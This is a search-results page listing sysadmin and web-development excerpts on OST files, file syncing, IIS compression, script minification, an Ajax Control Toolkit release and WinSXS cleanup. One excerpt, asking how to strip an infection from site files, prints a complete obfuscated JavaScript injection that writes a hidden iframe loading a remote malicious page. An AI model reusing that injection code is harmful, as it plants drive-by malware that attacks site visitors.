Search Results

Search found 56854 results on 2275 pages for 'temporary internet files'.

Page 407/2275 | < Previous Page | 403 404 405 406 407 408 409 410 411 412 413 414  | Next Page >

  • Outlook + Exchange 2007: it is possible to rid of local OST files?

    - by kdl
    I am looking for a solution which would allow to use a convenience of Outlook as a mail client app while at the same time have no PST or OST files on a local computer. Even in 'non-caching' mode Outlook creates an OST file where it downloads everything from the Exchange server. OWA does not create any local files (except cookies I believe) but lacks some of the nice features Outlook has. Would it be feasible to place OST files on a network share? Maybe the solution exists for some other client+server pair?

    Read the article

  • Multiple .bkf files created in Backupexec 12.5 or 2010 related to heavy I/O?

    - by syuusuke
    Hey everyone, I was wondering if anyone who has used backupexec 12.5 or 2010 have ever experienced multiple .bkf files created for a single job. To describe what I mean by multiple files, the .bkf are being created with random file sizes under 2GB even though I've assigned the setting to chop the file after 10GB size. Some jobs will create 20x .bkf files in 1 job with file chunks ranging from 50MB to 800MB sizes. Is this is a sign of heavy I/O issues? Bandwidth limitations? I'm not sure, I'm here to seek some advices and suggestions. I've setup another backup server with the same exact settings and they seem to create a new .bkf file when 10GB limit has been reached. Although I am backing up different machines but I know my settings are an exact match to the problematic or atleast I think it's a problem.

    Read the article

  • Have start menu index applications in places other than program files?

    - by user74757
    I love the ability to type any phrase into the start menu, and Windows 7 will bring up relevant executables under Program Files. However, I have a separate folder of my own where I store several portable applications - usually small apps that run straight out of an unzipped folder with little dependency. I have all of these under a specific hard-coded location - "PortableApps", but I would really like to tell the start menu to search this folder as well as Program Files for executables when searching. The search is often clogged because the executables I'm looking for are classified under "Documents" in the search results and buried in other non-related files. Is there a way I can achieve this in Windows 7? Thanks for any suggestions - Chase

    Read the article

  • Options to efficiently synchronize 1 million files with remote servers?

    - by Zilvinas
    At a company I work for we have such a thing called "playlists" which are small files ~100-300 bytes each. There's about a million of them. About 100,000 of them get changed every hour. These playlists need to be uploaded to 10 other remote servers on different continents every hour and it needs to happen quick in under 2 mins ideally. It's very important that files that are deleted on the master are also deleted on all the replicas. We currently use Linux for our infrastructure. I was thinking about trying rsync with the -W option to copy whole files without comparing contents. I haven't tried it yet but maybe people who have more experience with rsync could tell me if it's a viable option? What other options are worth considering?

    Read the article

  • What are 'damaged files' on external hard drive (HFS format for OS X)?

    - by dtlussier
    I have an external HD formatted to default HFS (Mac OS Extended - Journaled) and very once and a while I get a folder called DamagedFiles in the root of the volume. The folder contains a collection of links to files on the drive. In general the files seem fine as I am for example able to open the images or text files without a problem. Is this serious? What can I do to fix this problem? Any advice would be great as I couldn't find anything on here or via Google that addressed this problem in particular. Many thanks.

    Read the article

  • IIS7 is gzipping files but not serving the gzipped version.

    - by ptrin
    By following a number of helpful blog posts I have configured IIS to gzip my static files. I have even enabled Failed Request Tracing and filtered to the 200 status code, and I can see the successful compression events taking place as well as the finished headers, which look like this: Headers="Content-Type: text/css Content-Encoding: gzip Last-Modified: Mon, 04 Oct 2010 17:35:08 GMT Accept-Ranges: bytes ETag: "02ef37cea63cb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET " However, when I test in Fiddler and Firefox the Content-Encoding header is missing, and the file is not gzipped. This is a similar issue to this question which was never resolved. IIS is generating the gzipped files which I can see in C:\inetpub\temp\IIS Temporary Compressed Files . Does anyone know how I can troubleshoot this?

    Read the article

  • How does storage spaces decide where to put my files?

    - by George Duckett
    With Windows 8 Storage Spaces, you can lump many hard disks of varying types, speeds and sizes together to use as a single storage space / logical drive. How does Windows decide what to place where? For example will it move files about depending on frequency of access? Maybe splitting files frequently accessed together between hard disks etc. What does it optimize for? Speed, reliability, etc? If the above is asking too much, can I easily see where the files are physically (on which physical disk)?

    Read the article

  • How can I remove malware code in multiple files with sed?

    - by user47556
    I've this malware code in so many .html and .php files on the server. I need to remove them using sed -i expression search all files under directory /home/ find infected files remove the code by replacing it with a white space var usikwseoomg = 'PaBUTyjaZYg3cPaBUTyjaZYg69PaBUTyjaZYg66';var nimbchnzujc = 'PaBUTyjaZYg72';var szwtgmqzekr = 'PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg20PaBUTyjaZYg6ePaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22';var yvofadunjkv = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76';var ylydzxyjaci = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22';var xwojmnoxfbs = 'PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg72PaBUTyjaZYg63PaBUTyjaZYg3dPaBUTyjaZYg22';var mgsybgilcfx = 'PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg74PaBUTyjaZYg70PaBUTyjaZYg3aPaBUTyjaZYg2fPaBUTyjaZYg2f';var nixyhgyjouf = 'koska.sytes.net/phl/logs/index.php';var nesrtqwuirb = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg6dPaBUTyjaZYg61PaBUTyjaZYg72PaBUTyjaZYg67PaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg6dPaBUTyjaZYg61PaBUTyjaZYg72PaBUTyjaZYg67PaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg74PaBUTyjaZYg69PaBUTyjaZYg74PaBUTyjaZYg6cPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22';var rqchyojemkn = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76';var niupgeebkhf = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg63PaBUTyjaZYg72PaBUTyjaZYg6fPaBUTyjaZYg6cPaBUTyjaZYg6cPaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg67PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg6ePaBUTyjaZYg6fPaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg62PaBUTyjaZYg6fPaBUTyjaZYg72PaBUTyjaZYg64PaBUTyjaZYg65PaBUTyjaZYg72PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg66PaBUTyjaZYg72PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg62PaBUTyjaZYg6fPaBUTyjaZYg72PaBUTyjaZYg64PaBUTyjaZYg65PaBUTyjaZYg72PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg3e';var yyzsvtbnudd = 'PaBUTyjaZYg3cPaBUTyjaZYg2fPaBUTyjaZYg69PaBUTyjaZYg66';var tlclvgxfthn = 'PaBUTyjaZYg72PaBUTyjaZYg61';var zxttbudjafh = 'PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3e';var yydszqnduko = new Array();yydszqnduko[0]=new Array(usikwseoomg+nimbchnzujc+szwtgmqzekr+yvofadunjkv+ylydzxyjaci+xwojmnoxfbs+mgsybgilcfx+nixyhgyjouf+nesrtqwuirb+rqchyojemkn+niupgeebkhf+yyzsvtbnudd+tlclvgxfthn+zxttbudjafh);document['PaBUTyjaZYgwPaBUTyjaZYgrPaBUTyjaZYgiPaBUTyjaZYgtPaBUTyjaZYgePaBUTyjaZYg'.replace(/PaBUTyjaZYg/g,'')](window['PaBUTyjaZYguPaBUTyjaZYgnPaBUTyjaZYgePaBUTyjaZYgsPaBUTyjaZYgcPaBUTyjaZYgaPaBUTyjaZYgpPaBUTyjaZYgePaBUTyjaZYg'.replace(/PaBUTyjaZYg/g,'')](yydszqnduko.toString().replace(/PaBUTyjaZYg/g,'%')));

    Read the article

  • How can I get command prompt to merge my files in name order?

    - by Anastasia
    I'm using the copy command in command prompt to merge all the files in a directory, for a number of directories. The problem is, I need to edit the first file in each directory before I merge. This means that when I put in the command "copy /b *.mp3 name.mp3", the joined file has part 2 at the start and part 1 at the end, presumably because it was created last. Is there a way of using the copy command so that the files merge in name order? Each folder has a different number of parts, anywhere from 2 to 1000 so I don't want to list each file with a "+" in between. Ideally, I'd like to find something to insert into the copy command I'm already using. Otherwise, is there a way of rearranging the files in a folder so that if you enter "DIR", part 1 shows up first even if it was edited last? I'm using Windows 7 by the way.

    Read the article

  • How to batch rename files based on file header/metadata in Windows?

    - by Infraded
    I have a directory full of randomly named files of different types, all with no file extensions. Most are images, with some videos, and some plaintext. I've used one of the Windows versions of file to confirm the files can all be identified by their headers/metadata, but would like to automate the naming as there are roughly 2400 files. I don't care so much about the filename as much as just having the appropriate extension for it's type. Is anyone aware of a program or script that can do this?

    Read the article

  • How does the internet protocol handle network card numbers?

    - by Giorgio
    I know that data packets sent over the internet carry the source and destination IP address, so that the protocol can route the data to the correct destination and keep track of the source address of the packet. But what about the network card address? As far as I know, each network card has a unique identification number. Is this also transmitted with a TCP/IP packet? And when a packet is received at its destination, how is the IP address mapped to a network card number? In other words. On the sender part: does the sender store the sender network card number in the IP packets that it is sending? On the receiver part: which component maps the IP address to the receiver's network card number when a packet is received? E.g., in a home network, does the modem / router map the destination IP address of an incoming packet to a network card number and deliver the packet directly to that network card? A link to documentation on these topics would be of great help.

    Read the article

  • Windows 7 search for files with special characters in name.

    - by Luke
    I have a rather large source code repository on my machine; it is not indexed by Windows Search. I am trying to find some oddly-named generated files of the form .#name.extension.version where name and extension are normal names and extensions and version is a numeric value (e.g. something like 1.186). On Windows XP I could find these files by searching for .#*; on Windows 7 that just returns every single file and directory. So my question is this: is it possible to find files named like that using the built-in Windows 7 search functionality? I did find this question which is very similar, but the answer doesn't work for me; it seems like any special character I put in the query is either ignored or treated as a wildcard, and as a result it matches every single file and directory. Is there perhaps some registry value I can set to make the search-by-filename feature work with special characters?

    Read the article

  • How do I split a large MySql backup file into multiple files?

    - by Brian T Hannan
    I have a 250 MB backup SQL file but the limit on the new hosting is only 100 MB ... Is there a program that let's you split an SQL file into multiple SQL files? It seems like people are answering the wrong question ... so I will clarify more: I ONLY have the 250 MB file and only have the new hosting using phpMyAdmin which currently has no data in the database. I need to take the 250 MB file and upload it to the new host but there is a 100 MB SQL backup file upload size limit. I simply need to take one file that is too large and split it out into multiple files each containing only full valid SQL statements (no statements can be split between two files).

    Read the article

  • How can I rename files and subdirectories in a copied directory based on changes in the original?

    - by GaryF
    I have a directory structure with many hundreds of files and folders underneath it for organising files (in this case photos). I create backups of that directory structure by rsyncing it to identical copies on an external drives periodically. These drives may be offsite some of the time. I want to restructure and rename the files and directories in the original and then, later, when I have an external drive onsite, be able to run some tool that will cause these structural and naming changes to happen on the backup. If I just us rsync, it'll have to recopy much of the data to the backup drive, which I'd rather avoid due to the sizes involved. How can I get the changes I make to the original directory into the backups, as they become available, without having to recopy/rsync the data?

    Read the article

  • Configuring two subnets with two NICS. Access from a NAS to the internet

    - by archipestre
    I am having trouble configuring my NAS. I have a DSL router with WIFI (192.168.1.1) in my flatmates room. In my room I have a server with two NICS: 1) wlan0 (192.168.1.2) that connects to the DSL router via wireless 2) em1 (192.168.0.1) that connects to the NAS (192.168.0.20) with a crossover cable. I have Fedora 17 and I have enable packet forwarding. My IP configuration is as follows: WLAN0 inet 192.168.0.1 netmask 255.255.255.0 broadcast 192.168.0.255 EM1 inet 192.168.1.2 netmask 255.255.255.0 broadcast 192.168.1.255 My routing table looks like: Destination Gateway G enmask Flags Metric Ref Use Iface 0.0.0.0 192.168.1.1 0.0.0.0 UG 0 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 U 0 0 0 em1 192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0 I have enable a static route in the DSL server: Status Network Destination Subnet Mask Interface Gateway Remove Edit Active 192.168.0.0 255.255.255.0 LAN 192.168.1.2 From my server I can ping the DSL router and the NAS. From the NAS I can ping both NICS of the server. However the NAS is unable to ping the DSL router or any address in the Internet. Any idea of what is wrong. Thank you in advance

    Read the article

  • Print over the internet from a remote linux session locally (on a Windows 7 machine) to the shared printers?

    - by obeliksz
    I'm trying to use a linux virtual machine as a file server for windows clients. I have successfully implemented remote file sharing (samba+ssh) with which I am able to print locally with a little program that I made for this purpose (jetforms style)... but I would like to hear about a somewhat more direct approach. How can I attach the printers to the server, so that I can for example open a file on the remote session and in the print dialogbox I would see my local printers (on the machine from which I have established a remote session)? I guess there should be some kind of putty tunneling, but dont know how. I have a windows 7 machine locally; there is a CentOS 6 VM over the internet. It has ssh, cups, and samba. I have found a question which asks the opposite: there is a windows based server to connect form linux but that windows has a domain, mine is just a simple windows workstation that is behind NAT and has a dynamic IP. That question is: Print from Linux to Windows networked printer.

    Read the article

  • How to know ".automaticDestinations-ms" files to which app relates?

    - by Timotei Dolean
    Hello! Does anyone know (Because on microsoft forums nobody answered me), how can I find what app has which automaticDestinations-ms file in %appdata%\microsoft\windows\recent\automaticdestinations ? That's the folder where Windows 7 stores its jump lists, and I want to know how to automatically/programmatic find the relation between each file and an application. At least, even manual I didn't found any pattern, just to look after file extensions in the files, because some programs open files with the same extension (like images), so this method it's not OK for all programs. Do you have any other idea? Maybe knowing the format of those files? Thanks.

    Read the article

  • Two Way Sync of folder on PC to USB Thumb Drive over the internet.

    - by Tim Santeford
    Before flagging as duplicate please note that other similar posts do not have the same criteria below. Thanks Im looking for an app that will let me automatically sync a usb drive with a folder on my home system over the internet. I would like to roam from computer to computer and run this syncing app from the usb drive. Im looking for the same functionally as DropBox but without the 2gb restriction and without the need to fully install. Two Way sync between a usb drive and pc over the net Utilizes the full size of the usb drive not limited by an online storage size. (I dont need online backup or versioning) Allows the removal of the usb drive, Plugging it in to another computer will resume its sync. While the drive is connected the app should run silently keeping changed files in sync. (I dont want to run a manual process other than simply starting the app) Must be able to run as a portable app from the usb drive but can fully install on home pc. Window 7 Support is preferable. Please let me know if such and awesome app exists. TIA!

    Read the article

  • Can I move files from a laptop hard drive with a corrupt sector to a USB hard drive?

    - by Corey
    I have a hard drive that is on its way out and won't boot to Windows 7. The Windows partition takes up the whole disk. I thought I would try to recover some recent files that hadn't been backed up. Assuming the files are recoverable, how can I explore the drive that has the corrupt sector and transfer files to a USB hard drive? If it helps, the laptop is able to see the USB drive when choosing a boot order. Some searching lead me to WinPE 3.0, part of the Windows Automated Install Kit. Is that a method?

    Read the article

  • April 2013 Release of the Ajax Control Toolkit

    - by Stephen.Walther
    I’m excited to announce the April 2013 release of the Ajax Control Toolkit. For this release, we focused on improving two controls: the AjaxFileUpload and the MaskedEdit controls. You can download the latest release from CodePlex at http://AjaxControlToolkit.CodePlex.com or, better yet, you can execute the following NuGet command within Visual Studio 2010/2012: There are three builds of the Ajax Control Toolkit: .NET 3.5, .NET 4.0, and .NET 4.5. A Better AjaxFileUpload Control We completely rewrote the AjaxFileUpload control for this release. We had two primary goals. First, we wanted to support uploading really large files. In particular, we wanted to support uploading multi-gigabyte files such as video files or application files. Second, we wanted to support showing upload progress on as many browsers as possible. The previous version of the AjaxFileUpload could show upload progress when used with Google Chrome or Mozilla Firefox but not when used with Apple Safari or Microsoft Internet Explorer. The new version of the AjaxFileUpload control shows upload progress when used with any browser. Using the AjaxFileUpload Control Let me walk-through using the AjaxFileUpload in the most basic scenario. And then, in following sections, I can explain some of its more advanced features. Here’s how you can declare the AjaxFileUpload control in a page: <ajaxToolkit:ToolkitScriptManager runat="server" /> <ajaxToolkit:AjaxFileUpload ID="AjaxFileUpload1" AllowedFileTypes="mp4" OnUploadComplete="AjaxFileUpload1_UploadComplete" runat="server" /> The exact appearance of the AjaxFileUpload control depends on the features that a browser supports. In the case of Google Chrome, which supports drag-and-drop upload, here’s what the AjaxFileUpload looks like: Notice that the page above includes two Ajax Control Toolkit controls: the AjaxFileUpload and the ToolkitScriptManager control. You always need to include the ToolkitScriptManager with any page which uses Ajax Control Toolkit controls. The AjaxFileUpload control declared in the page above includes an event handler for its UploadComplete event. This event handler is declared in the code-behind page like this: protected void AjaxFileUpload1_UploadComplete(object sender, AjaxControlToolkit.AjaxFileUploadEventArgs e) { // Save uploaded file to App_Data folder AjaxFileUpload1.SaveAs(MapPath("~/App_Data/" + e.FileName)); } This method saves the uploaded file to your website’s App_Data folder. I’m assuming that you have an App_Data folder in your project – if you don’t have one then you need to create one or you will get an error. There is one more thing that you must do in order to get the AjaxFileUpload control to work. The AjaxFileUpload control relies on an HTTP Handler named AjaxFileUploadHandler.axd. You need to declare this handler in your application’s root web.config file like this: <configuration> <system.web> <compilation debug="true" targetFramework="4.5" /> <httpRuntime targetFramework="4.5" maxRequestLength="42949672" /> <httpHandlers> <add verb="*" path="AjaxFileUploadHandler.axd" type="AjaxControlToolkit.AjaxFileUploadHandler, AjaxControlToolkit"/> </httpHandlers> </system.web> <system.webServer> <validation validateIntegratedModeConfiguration="false"/> <handlers> <add name="AjaxFileUploadHandler" verb="*" path="AjaxFileUploadHandler.axd" type="AjaxControlToolkit.AjaxFileUploadHandler, AjaxControlToolkit"/> </handlers> <security> <requestFiltering> <requestLimits maxAllowedContentLength="4294967295"/> </requestFiltering> </security> </system.webServer> </configuration> Notice that the web.config file above also contains configuration settings for the maxRequestLength and maxAllowedContentLength. You need to assign large values to these configuration settings — as I did in the web.config file above — in order to accept large file uploads. Supporting Chunked File Uploads Because one of our primary goals with this release was support for large file uploads, we added support for client-side chunking. When you upload a file using a browser which fully supports the HTML5 File API — such as Google Chrome or Mozilla Firefox — then the file is uploaded in multiple chunks. You can see chunking in action by opening F12 Developer Tools in your browser and observing the Network tab: Notice that there is a crazy number of distinct post requests made (about 360 distinct requests for a 1 gigabyte file). Each post request looks like this: http://localhost:24338/AjaxFileUploadHandler.axd?contextKey={DA8BEDC8-B952-4d5d-8CC2-59FE922E2923}&fileId=B7CCE31C-6AB1-BB28-2940-49E0C9B81C64 &fileName=Sita_Sings_the_Blues_480p_2150kbps.mp4&chunked=true&firstChunk=false Each request posts another chunk of the file being uploaded. Notice that the request URL includes a chunked=true parameter which indicates that the browser is breaking the file being uploaded into multiple chunks. Showing Upload Progress on All Browsers The previous version of the AjaxFileUpload control could display upload progress only in the case of browsers which fully support the HTML5 File API. The new version of the AjaxFileUpload control can display upload progress in the case of all browsers. If a browser does not fully support the HTML5 File API then the browser polls the server every few seconds with an Ajax request to determine the percentage of the file that has been uploaded. This technique of displaying progress works with any browser which supports making Ajax requests. There is one catch. Be warned that this new feature only works with the .NET 4.0 and .NET 4.5 versions of the AjaxControlToolkit. To show upload progress, we are taking advantage of the new ASP.NET HttpRequest.GetBufferedInputStream() and HttpRequest.GetBufferlessInputStream() methods which are not supported by .NET 3.5. For example, here is what the Network tab looks like when you use the AjaxFileUpload with Microsoft Internet Explorer: Here’s what the requests in the Network tab look like: GET /WebForm1.aspx?contextKey={DA8BEDC8-B952-4d5d-8CC2-59FE922E2923}&poll=1&guid=9206FF94-76F9-B197-D1BC-EA9AD282806B HTTP/1.1 Notice that each request includes a poll=1 parameter. This parameter indicates that this is a polling request to get the size of the file buffered on the server. Here’s what the response body of a request looks like when about 20% of a file has been uploaded: Buffering to a Temporary File When you upload a file using the AjaxFileUpload control, the file upload is buffered to a temporary file located at Path.GetTempPath(). When you call the SaveAs() method, as we did in the sample page above, the temporary file is copied to a new file and then the temporary file is deleted. If you don’t call the SaveAs() method, then you must ensure that the temporary file gets deleted yourself. For example, if you want to save the file to a database then you will never call the SaveAs() method and you are responsible for deleting the file. The easiest way to delete the temporary file is to call the AjaxFileUploadEventArgs.DeleteTemporaryData() method in the UploadComplete handler: protected void AjaxFileUpload1_UploadComplete(object sender, AjaxControlToolkit.AjaxFileUploadEventArgs e) { // Save uploaded file to a database table e.DeleteTemporaryData(); } You also can call the static AjaxFileUpload.CleanAllTemporaryData() method to delete all temporary data and not only the temporary data related to the current file upload. For example, you might want to call this method on application start to ensure that all temporary data is removed whenever your application restarts. A Better MaskedEdit Extender This release of the Ajax Control Toolkit contains bug fixes for the top-voted issues related to the MaskedEdit control. We closed over 25 MaskedEdit issues. Here is a complete list of the issues addressed with this release: · 17302 MaskedEditExtender MaskType=Date, Mask=99/99/99 Undefined JS Error · 11758 MaskedEdit causes error in JScript when working with 2-digits year · 18810 Maskededitextender/validator Date validation issue · 23236 MaskEditValidator does not work with date input using format dd/mm/yyyy · 23042 Webkit based browsers (Safari, Chrome) and MaskedEditExtender · 26685 MaskedEditExtender@(ClearMaskOnLostFocus=false) adds a zero character when you each focused to target textbox · 16109 MaskedEditExtender: Negative amount, followed by decimal, sets value to positive · 11522 MaskEditExtender of AjaxtoolKit-1.0.10618.0 does not work properly for Hungarian Culture · 25988 MaskedEditExtender – CultureName (HU-hu) > DateSeparator · 23221 MaskedEditExtender date separator problem · 15233 Day and month swap in Dynamic user control · 15492 MaskedEditExtender with ClearMaskOnLostFocus and with MaskedEditValidator with ClientValidationFunction · 9389 MaskedEditValidator – when on no entry · 11392 MaskedEdit Number format messed up · 11819 MaskedEditExtender erases all values beyond first comma separtor · 13423 MaskedEdit(Extender/Validator) combo problem · 16111 MaskedEditValidator cannot validate date with DayMonthYear in UserDateFormat of MaskedEditExtender · 10901 MaskedEdit: The months and date fields swap values when you hit submit if UserDateFormat is set. · 15190 MaskedEditValidator can’t make use of MaskedEditExtender’s UserDateFormat property · 13898 MaskedEdit Extender with custom date type mask gives javascript error · 14692 MaskedEdit error in “yy/MM/dd” format. · 16186 MaskedEditExtender does not handle century properly in a date mask · 26456 MaskedEditBehavior. ConvFmtTime : function(input,loadFirst) fails if this._CultureAMPMPlaceholder == “” · 21474 Error on MaskedEditExtender working with number format · 23023 MaskedEditExtender’s ClearMaskOnLostFocus property causes problems for MaskedEditValidator when set to false · 13656 MaskedEditValidator Min/Max Date value issue Conclusion This latest release of the Ajax Control Toolkit required many hours of work by a team of talented developers. I want to thank the members of the Superexpert team for the long hours which they put into this release.

    Read the article

  • Select tool to minimize JavaScript and CSS size

    - by Michael Freidgeim
    There are multiple ways and techniques how to combine and minify JS and CSS files.The good number of links can be found in http://stackoverflow.com/questions/882937/asp-net-script-and-css-compression and in http://www.hanselman.com/blog/TheImportanceAndEaseOfMinifyingYourCSSAndJavaScriptAndOptimizingPNGsForYourBlogOrWebsite.aspx There are 2 major approaches- do it during build or at run-time.In our application there are multiple user-controls, each of them required different JS or CSS files, and they loaded dynamically in the different combinations. We decided that loading all JS or CSS files for each page is not a good idea, but for each page we need to load different set of files.Based on this combining files on the build stage does not looks feasible.After Reviewing  different links I’ve decided that squishit should fit to our needs. http://www.codethinked.com/squishit-the-friendly-aspnet-javascript-and-css-squisherDifferent limitations of using SquishIt.We had some browser specific CSS files, that loaded conditionally depending of browser type(i.e IE and all other browsers). We had to put them in separate bundles,For Resources and AXD files we decide to use HttpModule and HttpHandler created by Mads KristensenTo GZIP html we are using wwWebUtils.GZipEncodePage() http://www.west-wind.com/weblog/posts/2007/Feb/05/More-on-GZip-compression-with-ASPNET-Content Just swap the order of which encoding you apply to start by asking for deflate support and then GZip afterwards.Additional tips about SquishIt.Use CDN: https://groups.google.com/group/squishit/browse_thread/thread/99f3b61444da9ad1Support intellisense and generate bundle in codebehind http://tech.kipusoep.nl/2010/07/23/umbraco-45-visual-studio-2010-dotless-jquery-vsdoc-squishit-masterpages/Links about other Libraries that were consideredA few links from http://stackoverflow.com/questions/5288656/which-one-has-better-minification-between-squishit-and-combres2.Net 4.5 will have out-of-the-box tools for JS/CSS combining.http://weblogs.asp.net/scottgu/archive/2011/11/27/new-bundling-and-minification-support-asp-net-4-5-series.aspx . It suggests default bundle of subfolder, but also seems supporting similar to squishit explicitly specified files.http://www.codeproject.com/KB/aspnet/combres2.aspx  config XML file can specify expiry etchttps://github.com/andrewdavey/cassette http://stackoverflow.com/questions/7026029/alternatives-to-cassetteDynamically loaded JS files requireJS http://requirejs.org/docs/start.html  http://www.west-wind.com/weblog/posts/2008/Jul/07/Inclusion-of-JavaScript-FilesPack and minimize your JavaScript code sizeYUI Compressor (from Yahoo)JSMin (by Douglas Crockford)ShrinkSafe (from Dojo library)Packer (by Dean Edwards)RadScriptManager  & RadStyleSheetManager -fromTeleric(not free)Tools to optimize performance:PageSpeed tools family http://code.google.com/intl/ru/speed/page-speed/download.htmlv

    Read the article

  • How to use the Nautilus search option

    - by Luis Alvarado
    In Nautilus if I press CTRL+F I get a search box that helps me search in the current directory and sub directories for specific names, but what if I want to: Find ALL files (including files without extensions) Find a file without an extension (Without the dot symbol or without any other name/extension separator) Find a file with/without a special character Find all files that start/not start with a character Find all files that end/not end with a character Find all files that start/no start with a character but end/not end with a character Find only files/folders Find files with specific text in them Find files with less/more/equal than/to X size Find files modified/created in X date All of this searches in the Nautilus search box I mentioned before. I ask this since the KDE's search is much better in this and gives pretty good freedom in searching for virtually anything, so I might not be learning how to use the Nautilus search option correctly. Note that I am talking about the first search done since some of this options show AFTER a search is done so the user can narrow it down more by doing a more specific search inside the Search results (for the first search). I am asking here how to do any of the search options I mentioned above in the first search.

    Read the article

  • Friday Stats

    - by jjg
    As some of you may have noticed, we've recently opened a new repository in the Code Tools project for small utilities which can be used to gather info about the OpenJDK code base and builds. 1 The latest addition is a utility for analyzing the class file versions in a collection of class files. I've posted an example set of results from analyzing the class files in an OpenJDK build on Linux. 2. Most of the files are version 52 files as you would expect, but there is a surprising number of version 51 and 50 files, as well as a handful of v45.3 files as well. Digging deeper, it turns out that Nashorn is still using version 51 class files, and the Serviceability Agent is still using version 50 class files and one 45.3 class file, leaving the remainder of the 45.3 class files coming from RMI. For more info on the different class file versions, see Joe Darcy's class file version decoder rIng. Thanks to Stuart Marks for planting the seed for the class file version tool. See the project page, repo, and mail archive. http://cr.openjdk.java.net/~jjg/cfv-summary/open/

    Read the article

  • How to Reduce the Size of Your WinSXS Folder on Windows 7 or 8

    - by Chris Hoffman
    The WinSXS folder at C:\Windows\WinSXS is massive and continues to grow the longer you have Windows installed. This folder builds up unnecessary files over time, such as old versions of system components. This folder also contains files for uninstalled, disabled Windows components. Even if you don’t have a Windows component installed, it will be present in your WinSXS folder, taking up space. Why the WinSXS Folder Gets to Big The WinSXS folder contains all Windows system components. In fact, component files elsewhere in Windows are just links to files contained in the WinSXS folder. The WinSXS folder contains every operating system file. When Windows installs updates, it drops the new Windows component in the WinSXS folder and keeps the old component in the WinSXS folder. This means that every Windows Update you install increases the size of your WinSXS folder. This allows you to uninstall operating system updates from the Control Panel, which can be useful in the case of a buggy update — but it’s a feature that’s rarely used. Windows 7 dealt with this by including a feature that allows Windows to clean up old Windows update files after you install a new Windows service pack. The idea was that the system could be cleaned up regularly along with service packs. However, Windows 7 only saw one service pack — Service Pack 1 — released in 2010. Microsoft has no intention of launching another. This means that, for more than three years, Windows update uninstallation files have been building up on Windows 7 systems and couldn’t be easily removed. Clean Up Update Files To fix this problem, Microsoft recently backported a feature from Windows 8 to Windows 7. They did this without much fanfare — it was rolled out in a typical minor operating system update, the kind that don’t generally add new features. To clean up such update files, open the Disk Cleanup wizard (tap the Windows key, type “disk cleanup” into the Start menu, and press Enter). Click the Clean up System Files button, enable the Windows Update Cleanup option and click OK. If you’ve been using your Windows 7 system for a few years, you’ll likely be able to free several gigabytes of space. The next time you reboot after doing this, Windows will take a few minutes to clean up system files before you can log in and use your desktop. If you don’t see this feature in the Disk Cleanup window, you’re likely behind on your updates — install the latest updates from Windows Update. Windows 8 and 8.1 include built-in features that do this automatically. In fact, there’s a StartComponentCleanup scheduled task included with Windows that will automatically run in the background, cleaning up components 30 days after you’ve installed them. This 30-day period gives you time to uninstall an update if it causes problems. If you’d like to manually clean up updates, you can also use the Windows Update Cleanup option in the Disk Usage window, just as you can on Windows 7. (To open it, tap the Windows key, type “disk cleanup” to perform a search, and click the “Free up disk space by removing unnecessary files” shortcut that appears.) Windows 8.1 gives you more options, allowing you to forcibly remove all previous versions of uninstalled components, even ones that haven’t been around for more than 30 days. These commands must be run in an elevated Command Prompt — in other words, start the Command Prompt window as Administrator. For example, the following command will uninstall all previous versions of components without the scheduled task’s 30-day grace period: DISM.exe /online /Cleanup-Image /StartComponentCleanup The following command will remove files needed for uninstallation of service packs. You won’t be able to uninstall any currently installed service packs after running this command: DISM.exe /online /Cleanup-Image /SPSuperseded The following command will remove all old versions of every component. You won’t be able to uninstall any currently installed service packs or updates after this completes: DISM.exe /online /Cleanup-Image /StartComponentCleanup /ResetBase 